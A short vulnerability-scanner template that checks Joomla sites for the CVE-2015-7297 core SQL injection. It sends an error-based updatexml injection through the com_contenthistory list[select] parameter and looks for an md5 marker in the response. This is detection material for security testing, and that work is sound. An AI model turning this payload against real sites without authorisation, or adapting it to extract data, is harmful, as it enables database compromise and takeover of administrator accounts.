id: CVE-2015-7297

info:
    name: Joomla Core SQL Injection
    author: xpoc
    severity: high
    verified: true
    reference:
        - https://www.exploit-db.com/exploits/38797
        - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
        - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/
    tags: cve,cve2015,joomla,sqli
    created: 2023/08/02

set:
    r1: randomInt(10000000, 50000000)
rules:
    r0:
        request:
            method: GET
            path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{r1}})),1)
        expression: response.body.bcontains(bytes(md5(string(r1))))
expression: r0()
